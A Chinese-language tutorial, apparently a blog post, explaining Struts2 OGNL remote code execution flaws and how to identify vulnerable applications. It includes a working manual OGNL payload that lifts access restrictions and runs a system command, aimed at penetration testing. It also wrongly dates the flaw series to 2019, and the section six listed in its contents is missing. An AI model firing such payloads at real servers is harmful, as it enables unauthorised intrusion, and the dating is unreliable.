文章目录
- 一、Struts2框架介绍
- 二、Struts2远程代码执行漏洞
- 三、Struts2执行代码的原理
- 四、Struts2框架特征
- 五、漏洞手工POC
- 六、漏洞工具复现
一、Struts2框架介绍
------ Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。
------ Struts框架本身分为三个部分:核心控制器FilterDispatcher、业务控制器Action和用户实现的企业业务逻辑组件。
二、Struts2远程代码执行漏洞
------ Struts2漏洞是一个经典的漏洞系列,是在2019年被报出来的,根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效。
三、Struts2执行代码的原理
------ Struts2的动态性在于 OGNL表达式
可以获取到运行变量的值,并且有机会执行函数调用。如果可以把恶意的请求参数送到 OGNL的执行流程中,就会导致任意代码执行漏洞。
------ Struts2的rce本质都是一样的(除了S2-052以外),都是Struts2框架执行了恶意用户传进来的 OGNL表达式,造成远程代码执行。可以造成“命令执行、服务器文件操作、打印回显、获取系统属性、危险代码执行”等,只不过需要精心构造不同的 OGNL代码而已。
四、Struts2框架特征
-
查看被测应用系统的源码,URL接口地址以
“.action” “.do”结尾
或者地址中包含“!”符号
; -
在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在
struts2-core2.*.**.jar 或 xwork-core-2.*.**.jar
格式的jar文件,则需检测是否存在Struts2远程代码执行漏洞。
五、漏洞手工POC
poc:
(%23_memberAccess[‘allowPrivateAccess’]=true,%23_memberAccess[‘allowProtectedAccess’]=true,%23_memberAccess[‘excludedPackageNamePatterns’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘excludedClasses’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘allowPackageProtectedAccess’]=true,%23_memberAccess[‘allowStaticMethodAccess’]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream()))
注意:有些情况利用的时候要记得url编码
其他struts2版本的POC可以参考:
https://vulhub.org/#/environments/struts2/